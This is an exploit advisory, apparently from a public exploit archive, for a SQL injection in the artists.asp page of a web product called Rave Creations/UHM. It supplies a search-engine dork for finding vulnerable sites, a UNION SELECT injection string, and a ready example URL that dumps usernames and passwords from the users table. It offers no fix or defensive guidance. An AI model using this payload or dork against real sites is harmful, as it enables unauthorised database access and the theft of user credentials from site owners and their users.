30 lines
No EOL
1.2 KiB
Text
30 lines
No EOL
1.2 KiB
Text
************************************************************
|
|
** (artists.asp) SQL Injection Vulnerability
|
|
************************************************************
|
|
** Prodcut: Rave Creations/UHM
|
|
** Home : N/A
|
|
** Vunlerability : SQL Injection
|
|
** Risk : High
|
|
** Dork : "Sitedesign by: Dieleman www.dieleman.nl - Copyright © 2010"
|
|
************************************************************
|
|
** Discovred by: Ra3cH
|
|
** From : Algeria
|
|
** Contact : e51@hotmail.fr
|
|
** *********************************************************
|
|
** Greetz to : ALLAH
|
|
** All Members of http://www.DZ4All.cOm/Cc
|
|
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
|
|
************************************************************
|
|
** Exploit:
|
|
**
|
|
** http://[PATH]/artists.asp?id=(SQL)
|
|
**
|
|
** SQL=union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users
|
|
**
|
|
************************************************************
|
|
** Exemple:
|
|
**
|
|
**
|
|
** http://[site]/artists.asp?id=24%20union%20select%201,username,userpass,4,5,6,7,8,9,10,11,12,13%20from%20users
|
|
**
|
|
*********************************************************** |